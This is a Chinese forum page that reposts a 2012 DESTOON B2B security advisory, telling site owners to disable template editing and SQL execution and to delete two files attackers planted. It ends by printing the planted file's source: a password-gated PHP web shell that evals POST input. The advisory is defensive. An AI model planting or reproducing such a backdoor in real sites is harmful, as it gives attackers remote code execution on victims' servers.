无标题文档
wdCP系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdCDN系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
wdOS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdDNS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
注册 发贴 提问 回复-必看必看 wddns免费智能 DNS 开通 本地或虚拟机使 用wdcp 一键包在mysql编 译时"卡住"
AI导航网AI应用网站大全 wdcp官方技术支持/服务 阿里云8折优惠券 无敌云 腾讯云优惠中,现注册更有260代金额券赠送
返回列表 发帖
提问三步曲: 提问先看教程/FAQ索引(wdcp,wdcp_v3,一键包)及搜索,会让你更快解决问题
1 提供详细,如系统版本,wdcp版本,软件版本等及错误的详细信息,贴上论坛或截图发论坛
2 做过哪些操作或改动设置等

温馨提示:信息不详,很可能会没人理你!论坛有教程说明的,也可能没人理!因为,你懂的

DESTOON B2B紧急安全公告20121010

由于后台模板管理权限过大存在安全隐患,可能导致部分用户遭遇黑客攻击,为了您的网站安全,请看到此公告之后立即做以下处理:

一、修改根目录config.inc.php修改 $CFG['edittpl'] = '1'; 为 $CFG['edittpl'] = '0'; 禁用在线编辑模板功能,$CFG['executesql'] 也建议设置为 0 禁用后台执行SQL功能。3.0及以下版本用户,请临时删除admin/template.inc.php以免遭遇攻击。

二、检查站点目录是否存在file/swfupload/editor.php和company/link/link.php,如果存在,请立即删除,注意file/swfupload/editor.inc.php为系统正常文件,请不要误删。

设置过伪静态并且站点目录权限设置严格的用户不受此影响,请看到的用户相互转告,尽快处理。

提示:

系统需要设置可写的目录和文件详见:http://help.destoon.com/install/68.html,其他文件和目录请不要设置写入权限。

利用Rewrite规则设置网站安全:http://help.destoon.com/skill/71.html

PS:
黑客上传文件file/swfupload/editor.php 和 link.php文件源码:
  1. <?php if(md5($_GET['pass'])=='cfb83d29df045615c7d99d33110ef683'){eval($_POST[console]);}else{die('fuck off!');}?>
复制代码

云建站
要省钱,上汇诚:汇诚网

返回列表